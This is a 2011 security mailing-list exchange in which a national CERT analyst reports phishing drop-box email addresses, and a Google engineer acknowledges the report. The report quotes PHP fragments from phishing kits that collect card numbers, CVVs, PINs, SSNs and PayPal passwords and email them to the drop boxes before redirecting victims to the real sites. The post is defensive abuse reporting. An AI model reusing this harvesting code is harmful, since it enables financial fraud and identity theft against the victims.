[nsp-sec] phishing dropboxes at gmail.com / yahoo.com / ymail.com

Peter Moody pmoody at google.com
Fri Jan 21 14:38:30 EST 2011


ack.

On Fri, Jan 21, 2011 at 10:51 AM, Rodolfo Baader <rbaader at arcert.gov.ar> wrote:

> ----------- nsp-security Confidential --------
>
> Hi!
>
> While investigating a phishing case, we've found the following drop boxes:
>  gmail -> "zmetea at gmail.com"
>  yahoo -> "redytza at yahoo.com"
>  ymail -> "global.spun at ymail.com"
>
>
> Evidence:
>
> ==============================================================================
> [1] (...)
> $to = "zmetea at gmail.com,redytza at yahoo.com";
> //-----------------------------------
> $Security_Num2 = $_POST['Security_Num2'];
> $DOB = $_POST['DOB'];
> $Security_Num = $_POST['Security_Num'];
> $ip = $_SERVER['REMOTE_ADDR'];
> $subj = "($ip)IB: $Security_Num2 DOB: $DOB NUM: $Security_Num";
> $msg = "ID : $Security_Num2\nYour Date of birth : $DOB\nYour Security Number : $Security_Num\nip : $ip";
> $from = "FROM:Login at resultz.com";
> (...)
>
> [2] (...)
> //sending email info here
> $subj = "[ $card | $cvv | $expm\$expy ]";
> $msg = "CardHolder Name: $name\nDate of Birth: $a/$b/$c\nSocial Security Number: $ssn\nMother Maiden Name: $masa\nAddress: $address\nTown/City: $city\nProvince/Region: $state\nPostal Code: $zip\nCountry: $country\nPhone Number: $phone\nPayPal Email: $emailp\nPayPal Password: $emailpwd\nBank Name: $bank\nDebit / Credit Card Number: $card\nExpiration Date: $expm/$expy\nCard Verification Number: $cvv\nPIN: $pin\nSort Code: $sort\nAccount Number: $acc\nVBV Password: $vbv\n\n[IP: $ip | Date: $date ]";
> $from = "From: TheMentor<ppl at hi5.com>";
> mail("global.spun at ymail.com", $subj, $msg, $from);
> header("Location: https://www.paypal.com/");
> (...)
>
> [3] (...)
> //sending email info here
> $subj = "User: $user | ip: $ip ";
> $msg = "UserName: $user
> Mother maiden name: $mother
> Your password: $pass
> Memorable address or place: $address
> Memorable year: $year
>
> [IP: $ip | Date: $date ]";
> $from = "From: cahoot<cahoot at uk.com>";
> mail("zmetea at gmail.com,redytza at yahoo.com", $subj, $msg, $from);
> header("Location: https://www.cahoot.com/ibank/core_banking/logout/logged_out.html");
> (...)
>
>
> ==============================================================================
>
> Regards,
> R.
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>



-- 
Peter Moody      Google    1.650.253.7306
Network Security Engineer  pgp:0xC3410038


